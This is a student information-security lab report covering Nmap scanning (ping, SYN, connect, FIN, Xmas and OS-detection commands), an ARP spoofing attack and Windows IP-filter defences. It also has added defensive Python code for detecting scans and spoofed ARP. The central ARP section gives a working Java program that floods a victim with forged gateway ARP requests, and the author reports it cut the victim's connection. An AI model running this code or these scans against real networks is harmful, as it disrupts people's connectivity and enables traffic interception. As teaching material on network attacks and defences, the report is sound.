Information Security Technology Experiment Two: Network Scan Experiment + ARP Attack

Source: Internet
Author: User
Tags: get ip


I. Purpose and requirements of the experiment


1. Understand how scanning technology works;
2. Deepen the understanding of the lower layers of the network;
3. Master the basic usage of common scanning tools;
4. Learn the basic approach to designing a scanner program. (To be added later)


II. Experimental environment and related conditions (software used, laboratory equipment, major instruments and materials, etc.)


1. Experimental equipment: a microcomputer;
2. Software: Windows 7 operating system, Nmap.


III. Contents of the experiment


1. Installing Nmap on the Windows platform.
2. Using Nmap on the Windows platform.
3. Viewing local ports on the Windows platform.
4. Protection against port scanning.


IV. Experimental steps and results (including a brief description of the steps, a concluding statement and attached pages)

(0) Other knowledge preparation

1. View the local IP configuration on Windows: ipconfig


(1) Click "Start", "Run", enter "cmd" to open a Command Prompt window, then enter: ipconfig /all
For example:


2. View local ports on Windows: netstat


(1) Click "Start", "Run", enter "cmd" to open a Command Prompt window, then enter: netstat
For example:

(2) Parameters in detail
netstat displays statistics for the IP, TCP, UDP and ICMP protocols and is typically used to check the network connections on each port of the machine.
NETSTAT [-a] [-b] [-e] [-n] [-o] [-p proto] [-r] [-s] [-v] [interval]; for the full description, open a Command Prompt window and enter: netstat /?

(3) Example
First, open a Command Prompt window and enter: netstat -a, for example:



Second, take one line as an explanation:

Protocol (Proto): TCP, the transport-layer communication protocol
Local Address: 10.92.69.12, the computer's address, and the local port opened for the connection: 1156
Foreign Address: the remote machine, e.g. 112.90.78.141
Remote port: 8080
State: ESTABLISHED



Third, supplement: list of states
LISTENING: the port is waiting for incoming connections.
ESTABLISHED: a connection has been established.
TIME_WAIT: the connection has been closed on this side and is waiting for any delayed packets to expire before the entry is removed.


(i) Installing Nmap on the Windows platform


Note: this experiment was done mostly in the Windows Command Prompt window; the graphical interface tool for Nmap was not used.


1. Download the Nmap installer from the official website.


Official website: https://nmap.org/download.html


2. Install Nmap


Double-click the installer and accept all defaults. Installing Nmap on Windows also installs the WinPcap packet capture library, which lets callers such as Nmap and Wireshark capture raw frames from the network card.


3. Test whether the installation succeeded


(1) After the installation completes, click "Start", "Run", enter "cmd" and press Enter to open a Command Prompt window. Enter the command: ipconfig /all

Find the gateway IP: 10.29.32.254



(2) Enter the command: nmap -sA 10.29.32.254. This performs an ACK scan of the gateway. The results are as follows:

The following information can be seen:
Scan start time: 2016-10-18 09:17 China Standard Time
Scanned host: 10.29.32.254
Host status: up (powered on)
"All 1000 scanned ports ... are unfiltered": the 1000 scanned ports on host 10.29.32.254 have no firewall or packet-filtering software blocking Nmap's probes.
MAC address: 00:1a:a9:15:49:07 (this information is very useful; it is used later for the ARP attack)
Scan duration: 20.39 seconds
At this point, you can conclude that the installation was successful.


4. Improve the performance of the connect scan


(1) Go to Nmap's installation directory, e.g. C:\Program Files (x86)\Nmap, and locate the file nmap_performance.reg

(2) Double-click nmap_performance.reg to open it

(3) Click OK; the registry entries are added successfully.


(ii) Using Nmap on the Windows platform

1. Ping scan to detect hosts


Command: nmap -sP 10.29.32.1-254. Runs a ping scan to find the live hosts in the LAN.
(1) First scan; the results are as follows:

(2) Second scan; the results are as follows:

(3) Third scan; the results are as follows:

After several scans (repeat as many times as you like), the IP and MAC addresses of the following hosts are obtained:
10.29.32.48 00:90:f5:f9:cc:a5
10.29.32.254 .....
10.29.32.17 .....
PS: with these known, the ARP spoofing attack later can be applied to them.


2. Detecting the operating system type


Command: nmap -O <IP address>. Detects the operating system of a host in the LAN, e.g. 10.29.32.48.
(1) Enter nmap -O 10.29.32.48; results:

As can be seen, the host status is reported as down, although the earlier scan reported it up. So we infer that the host has a firewall, and TCP/IP fingerprint scanning is not feasible against it.
(2) Enter nmap -O 10.29.32.254; results:

The following information can be seen:
Host status: up
999 closed ports
Open ports: only one, 23/tcp open telnet, i.e. TCP port 23 is open and provides a Telnet service.
MAC address: 00:1a:a9:15:49:07
Operating system: the exact operating system could not be determined
...
Network Distance: 1 hop, i.e. only one hop away, which is the router.
Scan duration: 33.60 seconds.
(3) Enter nmap -O 10.29.32.17; results:

The following information can be seen:
Host status: up
989 filtered ports: "filtered" means the port is hidden by a firewall, packet filter or other network security software such as a security guard program.
Open ports: shown in the figure
MAC address: 2c:41:38:01:a8:00
Operating system: Microsoft Windows 7 or Phone or Vista or 2008
...
Network Distance: 1 hop, i.e. only one hop away, which is the router.
Scan duration: 26.38 seconds.
(4) Note: Nmap can also scan a Linux host, but that is basically not useful here: Linux security is relatively high, cloud hosts usually have a security group policy, and generally only a few ports are open, such as 22, 8080 and 3306. So it is not tested here.


3. TCP connect scan (-sT: full TCP connection scan)


(1) Enter nmap -sT 10.29.32.48; results:

The information in the red-lined part can be seen:
port 5357/tcp, state open, Microsoft Windows WSDAPI service available
(2) Enter nmap -sT 10.29.32.254; results:

The information in the red-lined part can be seen:
port 23/tcp, state open, Telnet service available
(3) Enter nmap -sT 10.29.32.17; results:


4. TCP SYN scan (-sS: TCP half-open scan)


(1) Enter nmap -sS 10.29.32.48; results:

As can be seen, the TCP half-open scan took 32.60 s, compared with 61.25 s for the TCP connect scan of the same host 10.29.32.48 above, so the TCP half-open scan is faster than the TCP full-connection scan.
(2) Enter nmap -sS 10.29.32.254; the result is similar and is not repeated.
(3) Enter nmap -sS 10.29.32.17; the result is similar and is not repeated.


5. Stealth scans


(1) Enter nmap -sF 10.29.32.48, nmap -sF 10.29.32.254 and nmap -sF 10.29.32.17 respectively; results:

As can be seen, the FIN scan could not discover the ports opened by the target hosts.
(2) Enter nmap -sX 10.29.32.48, nmap -sX 10.29.32.254 and nmap -sX 10.29.32.17 respectively; results:

As can be seen, the Xmas tree scan could not discover the target hosts' open ports either.
(3) Enter nmap -sN 10.29.32.48, nmap -sN 10.29.32.254 and nmap -sN 10.29.32.17 respectively (NULL scan). Results omitted.


6. Summary


From the five experiments above we can draw the following conclusions: the TCP full-connection scan obtains the most complete information but takes the longest; the TCP half-open (SYN) scan also obtains a lot of information but takes less time than the full-connection scan; the stealth scans take the least time but obtain the least information.
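As an added example (not part of the lab report), here is how these scan types look from the defender's side: a small Python detector run over constructed log lines written in the column layout of the Windows Firewall log (the layout is an assumption of this example, not something the lab shows). It flags a source that probes many distinct ports within a short window and labels the probe type from the TCP flags the lab's scans use: a bare SYN for the connect and half-open scans, FIN for the FIN scan, FIN+PSH+URG for the Xmas scan.

```python
"""Port-scan detection over firewall log lines (added example, not the lab's own code)."""
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Any, Dict, List, Optional

# Constructed sample, in the column layout of the Windows Firewall log (assumed here):
# date time action protocol src-ip dst-ip src-port dst-port size tcpflags ... path
COMMON_PORTS = [21, 22, 23, 25, 80, 110, 135, 139, 443, 445, 3306, 8080]
SAMPLE_LOG = "\n".join(
    # 12 bare-SYN probes from one source within seconds: a connect or half-open scan
    [f"2016-10-18 09:17:{i:02d} DROP TCP 10.29.32.48 10.29.32.17 4{i:04d} {p} 44 S 1 0 1024 - - - RECEIVE"
     for i, p in enumerate(COMMON_PORTS)]
    # 10 probes with FIN+PSH+URG set: the Xmas tree scan
    + [f"2016-10-18 09:20:{i:02d} DROP TCP 10.29.32.12 10.29.32.17 5{i:04d} {p} 40 FPU 1 0 1024 - - - RECEIVE"
       for i, p in enumerate(COMMON_PORTS[:10])]
    # one ordinary web connection, which must not be flagged
    + ["2016-10-18 09:25:00 ALLOW TCP 10.29.32.50 10.29.32.17 51000 80 52 S 1 0 8192 - - - RECEIVE"]
)

# TCP flag strings as the log records them, mapped to the scan types used in the lab.
# A SYN scan and a connect scan both open with a bare SYN, so the log cannot tell them apart.
SCAN_KINDS = {"S": "SYN (connect or half-open)", "F": "FIN", "FPU": "Xmas"}


def parse_line(line: str) -> Optional[Dict[str, Any]]:
    """Split one log line into the fields the detector needs; skip comments and short lines."""
    fields = line.split()
    if not fields or fields[0].startswith("#") or len(fields) < 10:
        return None
    when = datetime.strptime(f"{fields[0]} {fields[1]}", "%Y-%m-%d %H:%M:%S")
    return {"time": when, "action": fields[2], "proto": fields[3], "src": fields[4],
            "dst": fields[5], "dport": int(fields[7]), "flags": fields[9]}


def detect_scans(log_text: str, window_s: int = 60, min_ports: int = 10) -> List[Dict[str, Any]]:
    """Flag sources that touch at least min_ports distinct destination ports within window_s."""
    by_src: Dict[str, List[Dict[str, Any]]] = defaultdict(list)
    for event in filter(None, map(parse_line, log_text.splitlines())):
        by_src[event["src"]].append(event)
    findings: List[Dict[str, Any]] = []
    for src, events in by_src.items():
        events.sort(key=lambda e: e["time"])
        i = 0
        while i < len(events):
            # Take every event from events[i] up to window_s seconds later as one chunk
            end = events[i]["time"] + timedelta(seconds=window_s)
            j = i
            while j < len(events) and events[j]["time"] <= end:
                j += 1
            chunk = events[i:j]
            ports = {e["dport"] for e in chunk}
            if len(ports) >= min_ports:
                flags = Counter(e["flags"] for e in chunk if e["proto"] == "TCP")
                kind = SCAN_KINDS.get(flags.most_common(1)[0][0], "other") if flags else "non-TCP"
                findings.append({"src": src, "dst": chunk[0]["dst"], "distinct_ports": len(ports),
                                 "kind": kind, "first": chunk[0]["time"], "last": chunk[-1]["time"]})
            i = j
    return findings


if __name__ == "__main__":
    for f in detect_scans(SAMPLE_LOG):
        print(f"{f['src']} -> {f['dst']}: {f['distinct_ports']} ports, {f['kind']} scan, "
              f"{f['first'].time()}..{f['last'].time()}")
```

A dropped-packet log records only the first SYN of each probe, so the connect and half-open scans share one label; the timing difference measured above is the only outward distinction between them.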


(iii) ARP attack

1. Description:


The network scanning above is a passive network attack; next we introduce an active network attack: ARP spoofing. First of all, do not use this attack freely in a dormitory or public LAN, or the network administrator will come knocking at your door (GG). So I used a mobile phone, a tablet and a laptop to build a simple LAN: the phone's hotspot is turned on and acts as the gateway, and the laptop and tablet connected to it act as the two hosts in the LAN:


2. Brief introduction to ARP. Note: all of this is on Baidu Encyclopedia; look up the details yourself. I only highlight the key points.


The Address Resolution Protocol (ARP) is a TCP/IP protocol that obtains a physical (MAC) address from an IP address. When a host sends a message, it broadcasts an ARP request containing the destination IP address to all hosts on the network and waits for the reply to determine the target's physical address; when the reply arrives, the IP address and physical address are stored in the local ARP cache and kept for a certain time, so that the next request can be answered from the cache and resources are conserved. ARP is built on mutual trust between the hosts in the network: any host may send an ARP reply on its own, and the receiving host does not check whether the reply is genuine before recording it in its ARP cache. This allows an attacker to send a forged ARP reply to a host so that the host's traffic fails to reach the intended host or goes to the wrong host, which constitutes ARP spoofing. The arp command queries the IP-to-MAC correspondence in the local ARP cache and can add or remove static entries. Related protocols are RARP and proxy ARP; in IPv6, NDP replaces ARP.
In this case, simply put, the laptop (the attacker) sends a forged ARP reply to the tablet (the victim), so the MAC address recorded for a given IP in the tablet's ARP cache is wrong, and the data the tablet sends to that IP never reaches it.



Command to view the ARP cache table: arp -a. Results such as:


3. ARP spoofing principle


ARP is built on mutual trust between the hosts in a network. It makes the network run more efficiently, but it has its own defects:
The ARP address translation table depends on dynamic updates of the computer's cache memory, the update is bounded by an update period, and only the most recently used mappings are kept. This gives an attacker an opening: the translation table can be modified before the cache refreshes its entries, and the attack is carried out through that window. ARP requests are broadcast, any host on the network may send an ARP reply on its own, and the receiving host does not check the authenticity of the reply before recording it in its local MAC address translation table. An attacker can therefore tamper with a target host's local MAC table simply by sending it forged ARP replies.
An ARP attack achieves ARP spoofing with forged IP and MAC addresses. It can generate large amounts of ARP traffic that clogs the network, and as long as the attacker keeps sending forged ARP replies, it can change the IP-MAC entries in the target host's ARP cache table, causing a network outage or enabling a man-in-the-middle attack.
For example:
The attacker sends a forged ARP reply to computer A saying that computer B's IP address 192.168.0.2 corresponds to MAC address 00-aa-00-62-c6-03. Computer A believes it and writes this correspondence into its own ARP cache table, so data it later sends to computer B goes to the attacker instead. Likewise, the attacker sends a forged ARP reply to computer B saying that computer A's IP address 192.168.0.1 corresponds to MAC address 00-aa-00-62-c6-03, and computer B also sends its data to the attacker.
The attacker now controls the traffic between computer A and computer B, and can choose to passively monitor it to obtain passwords and other secrets, or tamper with the data to alter the communication between computer A and computer B.


4. Harm of ARP spoofing


ARP spoofing can cut off the target computer's communication with the gateway, or redirect its traffic so that all data passes through the attacker's machine, which is a serious security risk.


5. ARP message format (key!)
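Since the format figure did not survive, here is the layout in code: an added Python example (not the lab's own code) that parses the 14-byte Ethernet header and the 28-byte ARP message (hardware type, protocol type, address lengths, operation, sender and target MAC and IP), and applies the defensive counterpart of the spoofing principle in section 3: a monitor that keeps the IP-to-MAC bindings it sees and alerts when someone claims the trusted gateway address with a different MAC, when a learned binding flips, or when the ARP sender MAC disagrees with the Ethernet source. The sample frames are constructed from the lab's own addresses (gateway 192.168.43.1, tablet 192.168.43.244); nothing is sent on the wire.

```python
"""ARP frame parser and spoof monitor (added example, not the lab's own code)."""
import struct
from typing import Dict, List

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(text: str) -> bytes:
    """Accepts "b8-ee-65-aa-d9-b9" or "b8:ee:65:aa:d9:b9"."""
    return bytes(int(part, 16) for part in text.replace("-", ":").split(":"))


def ip_bytes(text: str) -> bytes:
    return bytes(int(part) for part in text.split("."))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def sample_frame(dst_mac: str, src_mac: str, op: int,
                 sha: str, spa: str, tha: str, tpa: str) -> bytes:
    """Constructed Ethernet + ARP frame, used here only as input for the monitor."""
    ether = mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ETHERTYPE_ARP)
    # htype 1 (Ethernet), ptype 0x0800 (IP), hlen 6, plen 4, then op, SHA, SPA, THA, TPA
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
           + mac_bytes(sha) + ip_bytes(spa) + mac_bytes(tha) + ip_bytes(tpa))
    return ether + arp


def parse_arp_frame(frame: bytes) -> Dict[str, object]:
    """Decode the 14-byte Ethernet header and the 28-byte ARP message that follows it."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet + ARP")
    ethertype = struct.unpack("!H", frame[12:14])[0]
    if ethertype != ETHERTYPE_ARP:
        raise ValueError(f"not an ARP frame (ethertype 0x{ethertype:04x})")
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unexpected ARP hardware/protocol fields")
    return {"eth_dst": mac_str(frame[0:6]), "eth_src": mac_str(frame[6:12]), "op": op,
            "sha": mac_str(frame[22:28]), "spa": ip_str(frame[28:32]),
            "tha": mac_str(frame[32:38]), "tpa": ip_str(frame[38:42])}


class ArpMonitor:
    """Tracks the IP -> MAC claims seen in ARP traffic and reports contradictions."""

    def __init__(self, trusted: Dict[str, str]):
        # Known-good bindings (for the lab: the gateway), normalised to lower-case colon form
        self.trusted = {ip: mac_str(mac_bytes(mac)) for ip, mac in trusted.items()}
        self.seen: Dict[str, str] = {}
        self.alerts: List[str] = []

    def observe(self, frame: bytes) -> List[str]:
        pkt = parse_arp_frame(frame)
        ip, mac = pkt["spa"], pkt["sha"]
        new: List[str] = []
        # Check 1: the ARP sender hardware address does not match the Ethernet source
        if pkt["eth_src"] != mac:
            new.append(f"sender MAC {mac} differs from Ethernet source {pkt['eth_src']}")
        # Check 2: somebody else claims a trusted address (the gateway in the lab)
        if ip in self.trusted and self.trusted[ip] != mac:
            new.append(f"{mac} claims trusted address {ip} (expected {self.trusted[ip]})")
        # Check 3: a binding learned earlier flips to a different MAC
        elif ip in self.seen and self.seen[ip] != mac:
            new.append(f"binding for {ip} changed from {self.seen[ip]} to {mac}")
        self.seen[ip] = mac
        self.alerts.extend(new)
        return new
```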




6. Implementing the ARP attack in Java to spoof other hosts in the LAN (emphasis; practice)


(1) Install WinPcap (search for how to download it). Since WinPcap was already installed together with Nmap, this step can be skipped.
(2) Copy Jpcap.dll into the JDK bin directory (note: Jpcap.dll and Jpcap.jar are easy to find; just match the 32-bit or 64-bit build; not repeated here)
(3) Import the Jpcap.jar package into the project

(4) Turn on the phone's Wi-Fi hotspot and connect the laptop and tablet to it. Open a Command Prompt window and enter ipconfig /all to see the network configuration the DHCP server (i.e. the phone) assigned to the laptop.

The network configuration of this host is:
Assigned IP: 192.168.43.69
Subnet mask: 255.255.255.0
Gateway: 192.168.43.1
MAC address of the wireless network card: B8-EE-65-AA-D9-B9
(5) Using the Nmap scan learned above, open a Command Prompt window and enter: nmap -sP 192.168.43.1-254. Results:

Three hosts are found in the LAN, with the following configurations:
Phone IP: 192.168.43.1, phone MAC: 24:1f:a0:07:f4:9d
Tablet IP: 192.168.43.244, tablet MAC: 4c:fb:45:e2:3f:97
This host (laptop) IP: 192.168.43.69
(6) Java code 1: forge and unicast an ARP request packet.
Description: in this code the laptop, as attacker, sends ARP request messages to the tablet (the victim) in which the real gateway IP-MAC correspondence has been altered: the real gateway MAC is replaced by a fake MAC address (which could also be the attacker laptop's own MAC), so the tablet is deceived. As long as the program keeps sending these ARP requests, the tablet stays spoofed and sends packets meant for the gateway (the phone) to the bogus MAC (or the attacker's laptop), which breaks the tablet's network connection or slows it down.


package arpattack;

import java.net.InetAddress;
import java.net.UnknownHostException;
import java.util.Scanner;

import jpcap.JpcapCaptor;
import jpcap.JpcapSender;
import jpcap.NetworkInterface;
import jpcap.packet.ARPPacket;
import jpcap.packet.EthernetPacket;

/**
 * ARP protocol message (forged request)
 *
 * @author ding
 */
public class ArpAttack {

    public static void main(String[] args) throws Exception {
        // Select the network card
        NetworkInterface device = getNetworkInterface();
        // Open the network card for sending
        JpcapSender sender = JpcapSender.openDevice(device);
        // Build the ARP packet
        ARPPacket arpPacket = createArpPacket();
        // Resend interval in seconds; controls the sending rate (0 = no pause)
        int time = 0;
        // Send the ARP packet repeatedly
        while (true) {
            System.out.println("Sending ARP:");
            sender.sendPacket(arpPacket);
            // The multiplier was lost in extraction; 1000 (seconds to milliseconds) is assumed here
            Thread.sleep(time * 1000L);
        }
    }

    public static ARPPacket createArpPacket() throws UnknownHostException {
        // Start building the ARP packet, i.e. the packet used to modify other hosts' ARP cache tables
        ARPPacket arpPacket = new ARPPacket();
        // Hardware type: Ethernet. Supplement: for Ethernet this field is 0001.
        arpPacket.hardtype = ARPPacket.HARDTYPE_ETHER;
        // Protocol type: IP. Supplement: 0800 means IP; ARP belongs to the IP protocol family.
        arpPacket.prototype = ARPPacket.PROTOTYPE_IP;
        // Operation: 1 is a request, 2 is a reply. A request is used here.
        arpPacket.operation = ARPPacket.ARP_REQUEST;
        // Hardware address length: a MAC address is 6 bytes.
        arpPacket.hlen = 6;
        // Protocol address length: 4 bytes for IPv4.
        arpPacket.plen = 4;
        // Sender MAC address. Because the packet is forged, it can be set arbitrarily.
        arpPacket.sender_hardaddr = toMacBytes("00-01-02-03-04-05");
        // Sender protocol (IP) address: impersonates the gateway's IP.
        arpPacket.sender_protoaddr = toIpBytes("192.168.43.1");
        // Target MAC address (normally to be filled in by the target). Forged, so arbitrary.
        arpPacket.target_hardaddr = toMacBytes("00-00-00-00-00-00");
        // Target protocol (IP) address: the host being spoofed.
        arpPacket.target_protoaddr = toIpBytes("192.168.43.244");
        /*----- end of the ARP message -----*/

        // Set up the DLC frame, i.e. the Ethernet frame header.
        EthernetPacket ether = new EthernetPacket();
        // Ethernet source address: the host that emits the ARP packet.
        // In my tests this had to be the attacker's real MAC; here the local wireless card's MAC.
        ether.src_mac = toMacBytes("B8-EE-65-AA-D9-B9");
        // Ethernet destination address: the victim's real MAC, or the broadcast address ff-ff-ff-ff-ff-ff.
        ether.dst_mac = toMacBytes("4c-fb-45-e2-3f-97");
        // Ethernet frame type, indicating the upper-layer protocol: 0806 for ARP.
        ether.frametype = EthernetPacket.ETHERTYPE_ARP;
        // Attach the Ethernet header to the ARP packet.
        arpPacket.datalink = ether;
        return arpPacket;
    }

    /**
     * Select the network card through the console
     *
     * @return the chosen interface
     */
    static NetworkInterface getNetworkInterface() {
        // Enumerate the network cards
        NetworkInterface[] devices = JpcapCaptor.getDeviceList();
        for (int i = 0; i < devices.length; i++) {
            byte[] mac = devices[i].mac_address;
            StringBuilder sb = new StringBuilder(i + ": ");
            for (int k = 0; k < mac.length; k++) {
                // Mask each byte to avoid sign extension of values above 0x7f
                sb.append(k > 0 ? "-" : "").append(Integer.toHexString(mac[k] & 0xff));
            }
            System.out.println(sb);
        }
        // Choose a card on the console
        System.out.println("Please enter the number of the network card to use");
        Scanner sc = new Scanner(System.in);
        NetworkInterface device = devices[sc.nextInt()];
        sc.close();
        return device;
    }

    /**
     * Convert an IP address string to bytes
     *
     * @param ipString dotted IPv4 address
     * @return the 4 address bytes
     * @throws UnknownHostException if the string is not a valid address
     */
    static byte[] toIpBytes(String ipString) throws UnknownHostException {
        return InetAddress.getByName(ipString).getAddress();
    }

    /**
     * Convert a MAC address string ("xx-xx-xx-xx-xx-xx") to bytes
     *
     * @param macStr hyphen-separated hex pairs
     * @return the 6 address bytes
     */
    static byte[] toMacBytes(String macStr) {
        byte[] mac = new byte[6];
        String[] parts = macStr.split("-");
        for (int x = 0; x < parts.length; x++) {
            // Radix 16: each part is a hex pair (the radix was lost in extraction)
            mac[x] = (byte) (Integer.parseInt(parts[x], 16) & 0xFF);
        }
        return mac;
    }
}


Note: the code is only meant to illustrate the principle of ARP spoofing and does not consider robustness or reusability. You can refactor it yourself.
(7) Result of running the code: the tablet loses its connection or its network becomes slow; with int time = 0 the network is cut off.
Opening Wireshark to capture packets shows a large number of ARP messages, as shown below:

Opening one packet for inspection, for example:



(8) Java code 2: forge and broadcast ARP request packets. To be added.
(9) Java code 3: forge ARP reply packets. To be added.


7. Limitations of the ARP attack


ARP attacks can only be carried out on an Ethernet LAN (a computer room, intranet, company network, etc.).
They cannot be carried out across the external network (the Internet, or a LAN elsewhere).


(iv) Prevention of port scanning

1. Principle


Generally speaking, every port a computer opens is a potential danger. Some necessary communication ports (such as 80 and 8080) cannot be closed, but most ports can be, especially on Windows systems. Ports should therefore be managed according to the situation, reducing the security risk.


2. Method 1: turn off unneeded network services (Windows as an example)


Some operating systems start certain services by default, but for some users these services are unnecessary. Access to their ports can therefore be disabled by stopping the services. The steps are as follows:
(1) "Control Panel", "Administrative Tools", "Services"

(2) Select the service to stop, right-click it and click "Stop" in the pop-up menu. This method is quite simple, so it is not repeated here.


3. Method 2: set IP filters (Windows as an example)

When a port cannot be closed by stopping a service, an IP filter can be set instead. The steps are as follows:
(1) Open a Command Prompt window and enter secpol.msc.

(2) In the Local Security Policy window, right-click "IP Security Policies on Local Computer" and choose "Create IP Security Policy...".

(3) Click "Next", change the name, add a description, then click "Next".

(4) Depending on circumstances, you may leave "Activate the default response rule (earlier versions of Windows only)" unchecked; I left it unchecked, then clicked "Next".

(5) Untick "Edit properties" and click "Finish".

(6) Back in the Local Security Policy window, the new policy "Hui Elder's IP Security Policy" appears. Right-click it and choose "Properties".

(7) In the "XXX IP Security Policy Properties" dialog, untick "Use Add Wizard", then click "Add (D)".

(8) In the "New Rule Properties" dialog, select the "IP Filter List" tab and click "Add (D)".

(9) In the "IP Filter List" dialog, change the name, untick "Use Add Wizard" and click "Add (D)".

(10) In the "IP Filter Properties" dialog, select the "Addresses" tab and make the settings.

(11) Select the "Protocol" tab, make the settings, then click "OK".

(12) Select the IP filter list just created, then click "OK".

(13) Back in the "New Rule Properties" dialog, select the "Filter Action" tab, untick "Use Add Wizard" and click "Add".

(14) In the "New Filter Action Properties" dialog, set the security method to "Block", then click "Apply" and "OK".

(15) Back on the "Filter Action" tab of "New Rule Properties", select the filter action just created and click "Apply" and "OK".

(16) Back on the "IP Filter List" tab of "New Rule Properties", select the "XXX" filter list just created and click "Apply" and "OK".

(17) Back in the completed "XXX IP Security Policy Properties" dialog, select the IP filter just created and click "Apply" and "OK".

(18) Back in the Local Security Policy window, right-click "FAI's IP Security Policy" and choose "Assign".

After clicking "Assign", the result is as follows:

(19) Test
A: Before assignment:

Scanning from another host with Nmap shows port 135 open. (Port 80 is used by HTTP and is enabled by default.)

B: After assignment:

Scanning from another host with Nmap shows port 135 filtered.

The experiment is a success!
(20) Control using the "Negotiate security" method with a pre-shared key.
First, in the "New Filter Action Properties" dialog, set the security method to "Negotiate security".

Next, in the "Edit Rule Properties" dialog, select the "Authentication Methods" tab and click "Add".

Then set the pre-shared key.

Next, do the same on the other computer (the target host being scanned).
Finally, testing found that the port is still filtered directly, and having the same pre-shared key did not work. The cause of the problem is still being investigated.

4. Method 3: install a software firewall.


This method is simple and is not repeated here.


V. Summary of the experiment (including experience, questions and suggestions for improvement)


1. Through this experiment, the basic principles of port scanners and vulnerability scanners were understood.
2. Through using the network scanner Nmap, scanning in different ways and analysing the resulting data, the basic use of the tool was learned and the basic principles of port scanners and vulnerability scanners were understood more deeply.
3. Extended learning of the ARP attack combined the passive attack of network scanning with the active ARP attack for analysing a host's vulnerabilities.
4. A deeper understanding of information security technology was gained.


